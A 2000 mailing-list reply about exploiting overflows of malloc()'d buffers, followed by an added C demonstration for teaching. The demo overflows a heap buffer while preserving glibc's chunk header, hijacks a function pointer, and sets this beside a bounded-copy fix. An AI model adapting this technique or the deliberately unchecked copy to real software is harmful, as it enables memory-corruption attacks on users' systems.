Subject: Re: Exploiting overflow of heap-based buffers
From: Chris Evans (chrisferret.lmh.ox.ac.uk)
Date: Wed May 24 2000 - 10:37:16 CDT


On Tue, 23 May 2000, Dave Wreski wrote:

> There's a lengthy article on heap overflows available at:
>
> http://www.w00w00.org/files/articles/heaptut.txt

Thanks for the pointer. I've re-read the article. It sounded familiar; I
think I read it when it first came out.

Unfortunately, it has a heavy bias towards overflow of static buffers
(from the program's BSS segment).

I'm more interested in overflow of buffers created with
malloc(). Obviously, overflowing such buffers is a much less precise art -
their location in memory will vary widely depending upon system and also
differing code paths through the application. Also, what is _after_ the
overflowed buffer will vary.

Quite a lot of "interesting" things to overwrite will be in the BSS. Won't
pointers returned by malloc() (un)fortunately be after the BSS in virtual
memory on Linux?

Cheers
Chris
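
Added example (my own code, not from Chris Evans, the thread or the w00w00
article): an overflow of a malloc()'d buffer into whatever chunk the
allocator happened to place next, which is the imprecision Chris describes.
It assumes Linux/glibc on x86-64, where two small allocations made back to
back on a fresh heap are contiguous and each user region is preceded by an
in-line chunk header, so the payload has to write the header bytes back
intact on its way to the next chunk. struct session, struct handler and the
two callbacks are hypothetical application objects; the bounded variant
beside the bug shows the fix.

```c
/* Added example, not code from the thread: overflow of a malloc()'d buffer
 * into the chunk glibc placed after it.  Assumes Linux/glibc x86-64 and a
 * fresh heap (no freed chunks of these sizes waiting in tcache).  The
 * structs and callbacks are hypothetical. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NAME_LEN 32

struct session { char name[NAME_LEN]; };              /* the overflowed object   */
struct handler { void (*cb)(const char *); int id; }; /* what happens to follow  */

static int g_hijacked;               /* lives in .bss */
static void legit_cb(const char *who) { (void)who; g_hijacked = 0; }
static void evil_cb(const char *who)  { (void)who; g_hijacked = 1; }

/* Vulnerable: strcpy-style copy with no bound on len. */
static void set_name_unchecked(struct session *s, const unsigned char *src, size_t len)
{
    char *dst = s->name;
    for (size_t i = 0; i < len; i++)
        dst[i] = (char)src[i];
}

/* Fixed: refuses anything that does not fit and always NUL-terminates. */
static int set_name_checked(struct session *s, const unsigned char *src, size_t len)
{
    if (len >= NAME_LEN)
        return -1;
    memcpy(s->name, src, len);
    s->name[len] = '\0';
    return 0;
}

/* Payload: NAME_LEN bytes of filler, then a verbatim copy of the bytes
 * between the end of name[] and h (the next chunk's in-line header, which
 * glibc checks on free()), then the replacement function pointer.
 * Returns the payload length, or 0 if h is not a short distance after s. */
static size_t build_payload(unsigned char *out, size_t cap,
                            const struct session *s, const struct handler *h,
                            void (*target)(const char *))
{
    const unsigned char *base = (const unsigned char *)s;
    ptrdiff_t gap = (ptrdiff_t)((uintptr_t)h - (uintptr_t)base);
    if (gap <= NAME_LEN || gap > 256 || (size_t)gap + sizeof target > cap)
        return 0;
    memset(out, 'A', NAME_LEN);
    memcpy(out + NAME_LEN, base + NAME_LEN, (size_t)gap - NAME_LEN);
    memcpy(out + gap, &target, sizeof target);
    return (size_t)gap + sizeof target;
}

/* 1 if the overflow redirected h->cb to evil_cb, 0 if not, -1 if the
 * allocator did not place h shortly after s. */
int demo_hijack(void)
{
    /* volatile: the compiler must not assume h->cb is still legit_cb */
    struct session *volatile s = malloc(sizeof *s);
    struct handler *volatile h = malloc(sizeof *h);
    unsigned char payload[512];
    if (!s || !h)
        return -1;
    g_hijacked = 0;
    h->cb = legit_cb;
    h->id = 7;
    size_t len = build_payload(payload, sizeof payload, s, h, evil_cb);
    if (len == 0)
        return -1;
    set_name_unchecked(s, payload, len);  /* the bug: runs past name[] into *h */
    h->cb("attacker");                     /* application calls "its" callback */
    int hit = g_hijacked;
    free(h);                               /* header preserved, so this is clean */
    free(s);
    return hit;
}

/* Same layout with the bounded copy: 1 if the oversized name was refused
 * and the callback is untouched. */
int demo_checked(void)
{
    struct session *volatile s = malloc(sizeof *s);
    struct handler *volatile h = malloc(sizeof *h);
    unsigned char payload[512];
    if (!s || !h)
        return 0;
    g_hijacked = 0;
    h->cb = legit_cb;
    h->id = 7;
    memset(payload, 'A', sizeof payload);
    int rc = set_name_checked(s, payload, sizeof payload);
    h->cb("attacker");
    int ok = (rc == -1 && g_hijacked == 0 && h->cb == legit_cb);
    free(h);
    free(s);
    return ok;
}

/* Chris's closing question: compares a .bss object with a small chunk.
 * True for glibc's brk heap; large mmap()'d allocations land elsewhere. */
int heap_above_bss(void)
{
    void *p = malloc(16);
    int above = p && (uintptr_t)p > (uintptr_t)&g_hijacked;
    free(p);
    return above;
}

int main(void)
{
    printf("unchecked copy hijacked callback: %d\n", demo_hijack());
    printf("checked copy refused, callback intact: %d\n", demo_checked());
    printf("heap above bss: %d\n", heap_above_bss());  /* run last: it recycles a chunk */
    return 0;
}
```

Build with a plain `gcc -O2 heap_demo.c` and run it. The distance between
the two objects is computed at run time rather than hard-coded, and that is
the practical point: under another allocator, or after earlier frees have
left chunks of these sizes in the free lists, the handler may land before
the session or far from it, and demo_hijack() reports -1 instead of
hijacking. An attacker has to engineer the allocation order, which is
exactly what makes malloc()'d targets less precise than a BSS address.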